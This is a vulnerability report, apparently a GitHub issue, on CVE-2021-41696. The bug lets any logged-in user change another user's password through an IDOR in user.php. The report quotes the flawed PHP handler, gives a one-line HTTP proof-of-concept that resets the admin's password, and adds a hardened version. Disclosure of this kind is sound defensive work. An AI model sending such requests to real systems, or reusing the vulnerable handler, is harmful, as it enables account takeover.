
[CVE-2021-41696] IDOR vulnerability in the password change procedure allows changing a password of any user #17

Description

@Sh4d0v

Note: The same type of IDOR vuln exists in a lot of other functions in user.php, but password change is most critical.
`requests\user.php`:

```php
<?php
case 'changep':
    $password = secureEncode($_POST['new_password']);
    if (strlen($password) < 6) {
        echo 'Error - '.$sm['lang'][654]['text'];
        exit;
    }
    $salt  = base64_encode($_POST['new_password'].secureEncode($_POST['user']));
    $pswd  = crypt($password, $salt);
    // The target account id comes straight from the request (IDOR): no check that
    // $_POST['user'] is the currently logged-in user, and no current-password check.
    $query = "UPDATE users SET pass = '".$pswd."',imported = '' WHERE id = '".secureEncode($_POST['user'])."'";
    $mysqli->query($query);
    break;
```

The id value in the UPDATE query is controlled by user input. Any authenticated user can change the password of the admin (id=1) or of any other user.

An exploit PoC would be something like:

```http
POST /requests/user.php HTTP/1.1

action=changep&user=1&new_password=12345678
```
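For comparison, here is a hardened version of the `changep` handler, added as an example for this issue; it is not code from the project. It assumes the logged-in user's id is kept in `$_SESSION['user_id']` (a hypothetical session key), that `$mysqli` is the open connection used by the original code, and that the form sends a new `current_password` field. The target account is taken from the session, never from `$_POST['user']`, the caller must re-authenticate with their current password, the update uses a prepared statement, and the new hash is produced by `password_hash()` instead of `crypt()` with a salt derived from the password and user id.

```php
<?php
// Added example (not the project's code): authorization-safe password change.
// Assumptions: $_SESSION['user_id'] holds the authenticated user's id (hypothetical
// key), $mysqli is the open mysqli connection, and the form posts current_password.
session_start();

function changeOwnPassword(mysqli $mysqli, array $post, array $session): string
{
    // 1. Never take the target account from the request; bind it to the session.
    if (empty($session['user_id'])) {
        return 'Error - not authenticated';
    }
    $userId = (int) $session['user_id'];

    $current = $post['current_password'] ?? '';
    $new     = $post['new_password'] ?? '';
    if (strlen($new) < 6) {
        return 'Error - password too short';
    }

    // 2. Re-authenticate: fetch the stored hash for the session user only.
    $stmt = $mysqli->prepare('SELECT pass FROM users WHERE id = ?');
    $stmt->bind_param('i', $userId);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    if (!$stmt->fetch()) {
        $stmt->close();
        return 'Error - user not found';
    }
    $stmt->close();

    // password_verify() checks any crypt()-format hash, so rows still carrying the
    // old crypt() output are accepted here and get re-hashed below on success.
    if (!password_verify($current, $storedHash)) {
        return 'Error - current password incorrect';
    }

    // 3. Store a bcrypt hash (PASSWORD_DEFAULT) and update only the session user's row.
    $newHash = password_hash($new, PASSWORD_DEFAULT);
    $stmt = $mysqli->prepare("UPDATE users SET pass = ?, imported = '' WHERE id = ?");
    $stmt->bind_param('si', $newHash, $userId);
    $stmt->execute();
    $changed = ($stmt->affected_rows === 1);
    $stmt->close();

    return $changed ? 'OK' : 'Error - update failed';
}

// Dispatch as in the original switch; the 'user' POST parameter is ignored entirely.
if (($_POST['action'] ?? '') === 'changep') {
    echo changeOwnPassword($mysqli, $_POST, $_SESSION);
    exit;
}
```

Note that `secureEncode()` on `$_POST['user']` does not address this bug: the problem is missing authorization (the handler trusts the request to name the account), not input encoding. The same pattern of taking the account id from the request should be reviewed in the other `user.php` actions the report mentions.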
